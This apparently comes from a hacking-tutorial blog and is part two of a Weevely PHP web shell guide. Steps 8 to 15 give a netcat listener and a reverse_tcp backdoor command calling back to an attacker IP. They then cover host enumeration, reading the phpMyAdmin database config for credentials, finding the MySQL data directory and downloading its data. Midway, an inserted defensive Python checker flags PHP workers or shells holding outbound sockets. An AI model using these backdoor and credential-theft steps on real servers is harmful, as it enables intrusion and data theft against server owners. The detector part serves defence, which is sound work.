PHP Web Shell and Stealth Backdoor : Weevely 2


Today I will continue with the second part of how to use the PHP web shell and stealth backdoor Weevely. If you haven’t read my previous post, you can find the tutorial here.

Today's tutorial covers how to download files using the Weevely PHP web shell, and how to use the reverse_tcp module so we can connect directly to the target system and gather as much information as we need.

Step by Step PHP Web Shell and Stealth Backdoor Weevely:

The victim IP address is 192.168.8.94 and the attacker IP address is 192.168.8.92.

7. By default, the Weevely web shell has a module to execute shell commands, :shell.sh <cmd>, but this method is a little inconvenient because you need to name the module every time you want to run a command.

:shell.sh w


The web shell was there. 🙂

The default Weevely module for executing shell commands is fine if you only run a single command like ps, whoami, etc., but if you try to run ls /etc/ it will throw an error.

8. Next we will use the backdoor module, with NetCat listening for the incoming connection on our attacker computer. Open a new terminal (CTRL + ALT + T) and run this command:

# nc -l -v -p 23

The port I use to listen on is 23 (telnet).

9. Back in our Weevely terminal, now that NetCat is listening on that port, we make a reverse TCP connection to our attacker computer.

:backdoor.reverse_tcp 192.168.8.92 23


After executing the Weevely backdoor module, the terminal where we ran the NetCat listener is ready to use.

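Added here from the defender's side, not part of the original tutorial: a Python checker that flags what step 9 leaves on the victim, namely a PHP worker (and the shell it spawns) holding an outbound socket to an unexpected port. It assumes ss -tnp-style input; the sample lines and the expected-port list are constructed.

```python
"""Flag established TCP sockets owned by web-server workers or shells.
Weevely's reverse_tcp makes the PHP process (or the shell it spawns) call back
to the attacker's listener, so such a socket is a strong indicator.
Sample input is constructed in the style of `ss -tnp` output."""
import re
from collections import namedtuple

WEB_WORKERS = {"php", "php-fpm", "php-cgi", "apache2", "httpd", "nginx"}
SHELLS = {"sh", "bash", "dash", "nc", "ncat", "perl", "python3"}
# Peer ports a web worker normally talks to; tune per host (assumption).
EXPECTED_PEER_PORTS = {80, 443, 3306, 5432, 6379, 11211}
Finding = namedtuple("Finding", "pid proc peer port reason")

SS_LINE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+\S+:\d+\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+)\s+"
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)

def suspicious_connections(ss_output):
    """One Finding per ESTAB socket a web worker or shell should not own."""
    findings = []
    for line in ss_output.splitlines():
        m = SS_LINE.match(line.strip())  # header and odd lines do not match
        if not m or m["state"] != "ESTAB":
            continue
        proc, rport = m["proc"], int(m["rport"])
        if proc in SHELLS:
            reason = "shell process owns a TCP socket"
        elif proc in WEB_WORKERS and rport not in EXPECTED_PEER_PORTS:
            reason = "web worker connected to unexpected port"
        else:
            continue
        findings.append(Finding(int(m["pid"]), proc, m["raddr"], rport, reason))
    return findings

# Constructed sample: php and its spawned sh both hold the callback socket
# to 192.168.8.92:23; the MySQL and sshd sockets are benign.
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port  Process
ESTAB 0      0      192.168.8.94:49152 192.168.8.92:23    users:(("php",pid=2231,fd=5))
ESTAB 0      0      192.168.8.94:49152 192.168.8.92:23    users:(("sh",pid=2240,fd=0))
ESTAB 0      0      127.0.0.1:52010    127.0.0.1:3306     users:(("apache2",pid=2231,fd=12))
ESTAB 0      0      192.168.8.94:22    192.168.8.10:51234 users:(("sshd",pid=811,fd=4))
"""

if __name__ == "__main__":
    for f in suspicious_connections(SAMPLE_SS):
        print(f"pid {f.pid} ({f.proc}) -> {f.peer}:{f.port}: {f.reason}")
```

Feed it `ss -tnp` output from the web server (or a saved capture) to triage; a worker talking to port 3306 on localhost is normal, a worker or sh talking to an arbitrary host is not.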

10. Now we will try to collect some useful information from this server.

cat /etc/issue -> find the Linux distribution type and version

cat /proc/version -> what's the kernel version, and is it 64-bit or 32-bit?


You can do more enumeration (data collection) to find out as much as possible about this server. (I will discuss this in another post.)

11. While enumerating, I found that this server is a web server with a MySQL database and phpMyAdmin installed. Now we will try to read the configuration on this server.

cat /etc/phpmyadmin/config-db.php


12. Oops, I forgot to write down how to download a file from this web server to our local directory using the Weevely PHP web shell and stealth backdoor 😀. We already know that this server probably uses MySQL, but we will find out more about the database location on this server.

ps -eo cmd,args | grep mysql


And finally we find that the database data directory points to /opt/lampp/var/mysql.

13. Now let's dig into this folder and find out whether there's valuable data or not.


14. Yes, there's some valuable data there 🙂. The next step is to bring that data to our computer by downloading it.


15. Done 🙂

Hope it's useful 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

Visit Website: http://www.vishnuvalentino.com